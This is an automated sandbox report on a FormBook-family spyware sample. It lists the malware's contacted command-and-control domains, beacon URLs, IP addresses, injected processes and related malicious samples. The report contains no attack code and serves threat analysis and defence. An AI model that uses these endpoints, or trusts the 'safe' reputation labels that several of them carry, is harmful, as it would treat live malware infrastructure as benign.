            http://www.cannulafactory.top/l90v/?56gD=65tz+8+CHtIdUwlLn50vsNwtrDevriXy7kK7USWOBh85j9WcKbCPI7UII3emD6Kks24YSbVOAcNXIRb+3rSlOmC04vqSX9mxzzPTrJ5MFsobFyJ/S8Jm0iQ=&gTSpc=Khb8pT0%Avira URL Cloudsafe
            http://www.redhat.com/0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.ayypromo.shop
            		176.57.64.102
            		truefalseunknown
            tadalaturbo.online
            		192.185.211.122
            		truefalseunknown
            fontanerourgente.net
            		37.187.158.211
            		truefalseunknown
            weep.site
            		194.233.65.154
            		truefalseunknown
            www.cannulafactory.top
            		18.183.3.45
            		truefalseunknown
            www.anaidittrich.com
            		162.55.254.209
            		truefalseunknown
            gangli.ssywan.com
            		64.64.237.133
            		truefalse
              		unknown
              www.xforum.tech
              		103.224.182.242
              		truefalseunknown
              www.datensicherung.email
              		85.13.151.9
              		truefalse
                		unknown
                www.jaxo.xyz
                		66.29.149.180
                		truetrueunknown
                32wxd.top
                		206.119.82.116
                		truefalseunknown
                www.jiyitf.top
                		104.21.35.73
                		truefalseunknown
                www.onlytradez.club
                		167.172.133.32
                		truefalseunknown
                www.88nn.pro
                		45.157.69.194
                		truefalseunknown
                www.551108k5.shop
                		unknown
                		unknowntrue
                  		unknown
                  www.taapbit.online
                  		unknown
                  		unknowntrueunknown
                  www.tadalaturbo.online
                  		unknown
                  		unknowntrueunknown
                  www.32wxd.top
                  		unknown
                  		unknowntrueunknown
                  www.weep.site
                  		unknown
                  		unknowntrueunknown
                  www.fontanerourgente.net
                  		unknown
                  		unknowntrueunknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://www.88nn.pro/l4rw/?56gD=ZXNQqBP58JXIf3luRKwQutCZ8KZdKGRl9UucInMS2YFRqgKt0pQ9Lq2gj3LI6pyb9XKzluqnMvvmNnss5NGj5OwULwtMZgZPw4PUiP5SYTwADLBcTbBMjV4=&gTSpc=Khb8pTfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.anaidittrich.com/qpwk/false
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.tadalaturbo.online/7o3y/?gTSpc=Khb8pT&56gD=34bWgTnU4AX1gKZq+j0JMo89G/eR8V4xUDpx7/bRsS0fRbM850xuSZ+vkJ4N+S3djb8r5M9tcI2Ggb3yyq8UxrbVXfSA+Cuoh4JbcMUl7SslS3/OMRxqtpA=false
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.cannulafactory.top/l90v/false
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.ayypromo.shop/rgqx/false
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.xforum.tech/647x/false
                  • 2%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.weep.site/v1m8/?56gD=MbosJJuAq5eUJ0hM82jOLc1IU8MUdjy9hjG8r0T6YD1U+30HrEc2VhBeVjG8H8kt/NUkGofbq5WDcsdH4YqjtrTEBunpF4CO/Z471XhtI61SngqlGgfTsbE=&gTSpc=Khb8pTfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://www.xforum.tech/647x/?56gD=FnaXBox54+ag7g5iwmP6lEuaYrNy9xf43eRchhJyHcxj2nBsvZZTTofBDuDrTRxDwJS/xlxq28wFbCJ7okUph0PYpOGusRgBTCti0+GqRf9NYEJ3M3nIg3s=&gTSpc=Khb8pTfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.onlytradez.club/zctj/false
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.onlytradez.club/zctj/?56gD=tSuw7IYRRjv+wnLSX6BcwOUAvtHef9BV3SuosHDPhpHVIQ9U3bF8KrgVZ9eofhuzjMlHgMWokK5nneJg1eEherCeW9gkiaKlQQJDWwurePQCYs04wJT4uh8=&gTSpc=Khb8pTfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.32wxd.top/kyiu/false
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.ayypromo.shop/rgqx/?56gD=k7UoFTYShwNh8X30FXwm38h6K+JkxlagtcywMstwCAmbg7ptW+NBcIDWqO/wkzukyRO00HsnixKpsDOlj0tXoOzwTrau4xfQqB+I7fBgXd6C+YuuVtNtf8U=&gTSpc=Khb8pTfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.anaidittrich.com/qpwk/?56gD=Pn8OF1j/flre3VebOMg2UbcWr5CJafCXadgaNymjhjlyVvhoWwCe/sZUerDBeXD1/Dp7mYeP8BtJLpf3hF/3n4t4NMFgDvNRYoQEyTx0vs+6FBV4KM09ubA=&gTSpc=Khb8pTfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.jiyitf.top/uhl0/?56gD=ncGfyjKG78FJ3RoiM5vIj9c1hRDw+kHAJl3DW65koN/XsollpddV5N2bVVuKdzPyIkh4e3ZVd/UrgbHQf7fI8bXCzTYoePvJD/HBD8ObPaKNbBrKYFELLGg=&gTSpc=Khb8pTfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.88nn.pro/l4rw/false
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.32wxd.top/kyiu/?56gD=XDGtsL25HTw6JP67Ly7M1BrbeTxg63xVn4NdqHGWC1gt1eOjH+BVmk6PIm5PWw2c27Ak8m93WqRL2MBomZszGMKw0lI8qqbvBzBP6NUCsyvYxAKvE0l8E9k=&gTSpc=Khb8pTfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.fontanerourgente.net/t3gh/?56gD=d/YHbjU0lRTRkwDxqDIxsrPGLZyEpz4ER5WtK+J3r0U/ADUIPiMSea/+ySZyWjMipb/6l9jjBkeXWJl7BthesnFC5CTi9Yzd9moJgM9Hp7ieo4nvRaLbJdA=&gTSpc=Khb8pTfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.datensicherung.email/gs9g/false
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.jiyitf.top/uhl0/false
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.jaxo.xyz/f9bc/false
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.fontanerourgente.net/t3gh/false
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.551108k5.shop/0or4/?56gD=Ap9XVhmqGkofKqiWnW9mL5/l5ZSEUCfyrZ4yzU5Yy+i7TWDOWZwNJN7AITR5XrxbOYEdZ4fD4Uqd39DYFcK8F05zK8C70DAcVzFic5Orq8iLvChdOek9rdc=&gTSpc=Khb8pTfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.tadalaturbo.online/7o3y/false
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.551108k5.shop/0or4/false
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.cannulafactory.top/l90v/?56gD=65tz+8+CHtIdUwlLn50vsNwtrDevriXy7kK7USWOBh85j9WcKbCPI7UII3emD6Kks24YSbVOAcNXIRb+3rSlOmC04vqSX9mxzzPTrJ5MFsobFyJ/S8Jm0iQ=&gTSpc=Khb8pTfalse
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://mgmasistencia.com/wp-includes/css/dist/block-library/style.min.css?ver=6.6.1rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://duckduckgo.com/chrome_newtabrasdial.exe, 00000006.00000002.4133150146.0000000007FAE000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://duckduckgo.com/ac/?q=rasdial.exe, 00000006.00000002.4133150146.0000000007FAE000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://mgmasistencia.com/acerca-de/rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://mgmasistencia.com/wp-content/themes/twentytwentyone/style.css?ver=1.4rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://mgmasistencia.com/sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://anaidittrich.com/qpwk/?56gD=Pn8OF1j/flre3VebOMg2UbcWr5CJafCXadgaNymjhjlyVvhoWwCe/sZUerDBeXD1/rasdial.exe, 00000006.00000002.4131381557.00000000068B8000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000003B28000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://tilda.ccrasdial.exe, 00000006.00000002.4131381557.0000000006726000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000003996000.00000004.00000001.00040000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=rasdial.exe, 00000006.00000002.4133150146.0000000007FAE000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=rasdial.exe, 00000006.00000002.4131381557.0000000005904000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002B74000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2317942317.00000000317D4000.00000004.80000000.00040000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/polyfills.js?ver=1.4rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://twitter.com/wordpressrasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://mgmasistencia.com/blog/rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://es.wordpress.org/rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://mgmasistencia.com/2021/08/30/hola-mundo/rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/css/print.css?ver=1.4rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://nginx.net/rasdial.exe, 00000006.00000002.4131381557.0000000006402000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000003672000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchrasdial.exe, 00000006.00000002.4133150146.0000000007FAE000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/responsive-embeds.js?ver=1.4rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://mgmasistencia.com/comments/feed/rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://mgmasistencia.com/wp-json/sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://mgmasistencia.com/wp-content/uploads/2021/09/fondo-plumber-1000x429-1.jpgrasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://mgmasistencia.com/contacto/rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://api.w.org/sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=rasdial.exe, 00000006.00000002.4133150146.0000000007FAE000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://mgmasistencia.com/feed/rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.ecosia.org/newtab/rasdial.exe, 00000006.00000002.4133150146.0000000007FAE000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.tadalaturbo.onlinesXIYDUFnJY.exe, 00000007.00000002.4132511834.0000000004C2A000.00000040.80000000.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/primary-navigation.js?ver=1.4rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.redhat.com/docs/manuals/enterprise/rasdial.exe, 00000006.00000002.4131381557.0000000006402000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000003672000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://ac.ecosia.org/autocomplete?q=rasdial.exe, 00000006.00000002.4133150146.0000000007FAE000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://wordpress.org/rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.xforum.tech/647x/?56gD=FnaXBox54sXIYDUFnJY.exe, 00000007.00000002.4130799884.00000000034E0000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://mgmasistencia.com/2021/08/30/hola-mundo/#comment-1rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://mgmasistencia.com/xmlrpc.php?rsdrasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.551108k5.shop/0or4/?56gD=Ap9XVhmqGkofKqiWnW9mL5/l5ZSEUCfyrZ4yzU5Yyrasdial.exe, 00000006.00000002.4131381557.0000000006A4A000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000003CBA000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.redhat.com/sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000003672000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=rasdial.exe, 00000006.00000002.4133150146.0000000007FAE000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  176.57.64.102
                  		www.ayypromo.shopBosnia and Herzegowina
                  		47959TELINEABAfalse
                  162.55.254.209
                  		www.anaidittrich.comUnited States
                  		35893ACPCAfalse
                  167.172.133.32
                  		www.onlytradez.clubUnited States
                  		14061DIGITALOCEAN-ASNUSfalse
                  18.183.3.45
                  		www.cannulafactory.topUnited States
                  		16509AMAZON-02USfalse
                  103.224.182.242
                  		www.xforum.techAustralia
                  		133618TRELLIAN-AS-APTrellianPtyLimitedAUfalse
                  192.185.211.122
                  		tadalaturbo.onlineUnited States
                  		46606UNIFIEDLAYER-AS-1USfalse
                  206.119.82.116
                  		32wxd.topUnited States
                  		174COGENT-174USfalse
                  85.13.151.9
                  		www.datensicherung.emailGermany
                  		34788NMM-ASD-02742FriedersdorfHauptstrasse68DEfalse
                  194.233.65.154
                  		weep.siteGermany
                  		6659NEXINTO-DEfalse
                  104.21.35.73
                  		www.jiyitf.topUnited States
                  		13335CLOUDFLARENETUSfalse
                  45.157.69.194
                  		www.88nn.proGermany
                  		136933GIGABITBANK-AS-APGigabitbankGlobalHKfalse
                  66.29.149.180
                  		www.jaxo.xyzUnited States
                  		19538ADVANTAGECOMUStrue
                  37.187.158.211
                  		fontanerourgente.netFrance
                  		16276OVHFRfalse
                  64.64.237.133
                  		gangli.ssywan.comCanada
                  		25820IT7NETCAfalse

                  General Information

                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1503946
                  Start date and time:2024-09-04 09:34:06 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 9m 43s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:9
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:2
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:220204-TF1--00.exe
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@7/5@15/14
                  EGA Information:
                  • Successful, ratio: 75%
                  HCA Information:
                  • Successful, ratio: 97%
                  • Number of executed functions: 60
                  • Number of non-executed functions: 259
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                  Warnings

                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target sXIYDUFnJY.exe, PID 4908 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report creation exceeded maximum time and may have missing disassembly code information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  03:36:09API Interceptor10913904x Sleep call for process: rasdial.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  176.57.64.10220-EM-00- PI-INQ-3001.exeGet hashmaliciousFormBookBrowse
                  • www.ayypromo.shop/rgqx/
                  RFQ STR-160-01.exeGet hashmaliciousFormBookBrowse
                  • www.ayypromo.shop/rgqx/
                  #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                  • www.ayypromo.shop/mktg/
                  031215-Revised-01.exeGet hashmaliciousFormBookBrowse
                  • www.ayypromo.shop/rgqx/
                  Copy of 01. Bill of Material - 705.exeGet hashmaliciousFormBookBrowse
                  • www.ayypromo.shop/rgqx/
                  Pro#U015bba o Wycena - Strony 4-6.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                  • www.ayypromo.shop/mktg/
                  TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exeGet hashmaliciousFormBookBrowse
                  • www.ayypromo.shop/6ocx/
                  162.55.254.20920-EM-00- PI-INQ-3001.exeGet hashmaliciousFormBookBrowse
                  • www.anaidittrich.com/qpwk/
                  RFQ STR-160-01.exeGet hashmaliciousFormBookBrowse
                  • www.anaidittrich.com/qpwk/
                  Copy of 01. Bill of Material - 705.exeGet hashmaliciousFormBookBrowse
                  • www.anaidittrich.com/qpwk/
                  167.172.133.3220-EM-00- PI-INQ-3001.exeGet hashmaliciousFormBookBrowse
                  • www.onlytradez.club/zctj/
                  RFQ STR-160-01.exeGet hashmaliciousFormBookBrowse
                  • www.onlytradez.club/zctj/
                  031215-Revised-01.exeGet hashmaliciousFormBookBrowse
                  • www.onlytradez.club/zctj/
                  Copy of 01. Bill of Material - 705.exeGet hashmaliciousFormBookBrowse
                  • www.onlytradez.club/zctj/
                  RCZ-PI-4057.exeGet hashmaliciousFormBookBrowse
                  • www.onlytradez.club/zctj/
                  APS-0240226.exeGet hashmaliciousFormBookBrowse
                  • www.onlytradez.club/zctj/
                  Contract.exeGet hashmaliciousFormBookBrowse
                  • www.onlytradez.club/h6ky/
                  draft Proforma Invoice.exeGet hashmaliciousFormBookBrowse
                  • www.onlytradez.club/h6ky/

                  Domains

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  www.ayypromo.shop20-EM-00- PI-INQ-3001.exeGet hashmaliciousFormBookBrowse
                  • 176.57.64.102
                  RFQ STR-160-01.exeGet hashmaliciousFormBookBrowse
                  • 176.57.64.102
                  #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                  • 176.57.64.102
                  031215-Revised-01.exeGet hashmaliciousFormBookBrowse
                  • 176.57.64.102
                  Copy of 01. Bill of Material - 705.exeGet hashmaliciousFormBookBrowse
                  • 176.57.64.102
                  Pro#U015bba o Wycena - Strony 4-6.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                  • 176.57.64.102
                  TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exeGet hashmaliciousFormBookBrowse
                  • 176.57.64.102
                  www.cannulafactory.top20-EM-00- PI-INQ-3001.exeGet hashmaliciousFormBookBrowse
                  • 18.183.3.45
                  RFQ STR-160-01.exeGet hashmaliciousFormBookBrowse
                  • 18.183.3.45
                  #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                  • 18.183.3.45
                  031215-Revised-01.exeGet hashmaliciousFormBookBrowse
                  • 18.183.3.45
                  Copy of 01. Bill of Material - 705.exeGet hashmaliciousFormBookBrowse
                  • 18.183.3.45
                  RCZ-PI-4057.exeGet hashmaliciousFormBookBrowse
                  • 18.183.3.45
                  APS-0240226.exeGet hashmaliciousFormBookBrowse
                  • 18.183.3.45
                  Pro#U015bba o Wycena - Strony 4-6.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                  • 18.183.3.45

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  DIGITALOCEAN-ASNUShttps://knowledgeable-expert.surge.sh/id.html/Get hashmaliciousUnknownBrowse
                  • 138.197.235.123
                  https://pretty-spring.surge.sh/id.html/Get hashmaliciousUnknownBrowse
                  • 138.197.235.123
                  http://xsdrt.hanslot88gacor.com/4fBcna16686hpgN1202wmiembuhsb14569WJUNFCAXDHLQZZY1707NPBU18900N17Get hashmaliciousUnknownBrowse
                  • 134.122.57.34
                  https://metaverifiedbadges.co/175261668994311/index.php?nick=YWZyaWNhbmJ1c2hjYW1wcw==&id=1526032324Get hashmaliciousUnknownBrowse
                  • 161.35.140.50
                  https://metaverifiedbadges.co/175261668994311/index.php?nick=YWZyaWNhbmJ1c2hjYW1wcw==&id=1526032324Get hashmaliciousUnknownBrowse
                  • 161.35.140.50
                  https://metaverifiedbadges.co/175261668994311/index.php?nick=YXdlX25haW1hZF9zd2VlZWVldA==Get hashmaliciousUnknownBrowse
                  • 161.35.140.50
                  https://www.louisvillesports.org/Get hashmaliciousUnknownBrowse
                  • 162.243.38.246
                  https://docsend.com/view/s/p589qibnit8ety2yGet hashmaliciousUnknownBrowse
                  • 45.55.99.106
                  20-EM-00- PI-INQ-3001.exeGet hashmaliciousFormBookBrowse
                  • 167.172.133.32
                  dll.ps1Get hashmaliciousUnknownBrowse
                  • 207.154.255.134
                  ACPCA20-EM-00- PI-INQ-3001.exeGet hashmaliciousFormBookBrowse
                  • 162.55.254.209
                  Rockwool group_SKM_C590368369060_417161.pdf.pdfGet hashmaliciousHTMLPhisherBrowse
                  • 162.0.217.108
                  PO#86637.exeGet hashmaliciousFormBookBrowse
                  • 162.0.213.94
                  https://sweet-solomon.67-23-166-125.plesk.page/dave_jackson_tremblay/fouleebel--_--legardaise/victorien--_--.andre/tonysandrine.--_--henedieu/david.hernandez--_--aristizabalGet hashmaliciousUnknownBrowse
                  • 162.55.246.61
                  RFQ STR-160-01.exeGet hashmaliciousFormBookBrowse
                  • 162.55.254.209
                  firmware.arm-linux-gnueabihf.elfGet hashmaliciousUnknownBrowse
                  • 162.48.22.207
                  PI 30_08_2024.exeGet hashmaliciousFormBookBrowse
                  • 162.0.213.94
                  estado de cuenta adjunto.exeGet hashmaliciousFormBookBrowse
                  • 162.0.213.72
                  Izvod racuna u prilogu.exeGet hashmaliciousDBatLoader, FormBookBrowse
                  • 162.0.213.72
                  https://bio.to/vCOt6dGet hashmaliciousHTMLPhisherBrowse
                  • 162.0.217.108
                  TELINEABA20-EM-00- PI-INQ-3001.exeGet hashmaliciousFormBookBrowse
                  • 176.57.64.102
                  RFQ STR-160-01.exeGet hashmaliciousFormBookBrowse
                  • 176.57.64.102
                  #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                  • 176.57.64.102
                  031215-Revised-01.exeGet hashmaliciousFormBookBrowse
                  • 176.57.64.102
                  Copy of 01. Bill of Material - 705.exeGet hashmaliciousFormBookBrowse
                  • 176.57.64.102
                  Pro#U015bba o Wycena - Strony 4-6.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                  • 176.57.64.102
                  TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exeGet hashmaliciousFormBookBrowse
                  • 176.57.64.102
                  sKQrQ9KjPJ.elfGet hashmaliciousMiraiBrowse
                  • 88.214.61.219
                  KE4cyjDEDO.elfGet hashmaliciousMiraiBrowse
                  • 88.214.61.224
                  http://91.223.169.83Get hashmaliciousUnknownBrowse
                  • 91.223.169.83
                  AMAZON-02UShttps://t.ly/nFp5iGet hashmaliciousUnknownBrowse
                  • 54.231.196.233
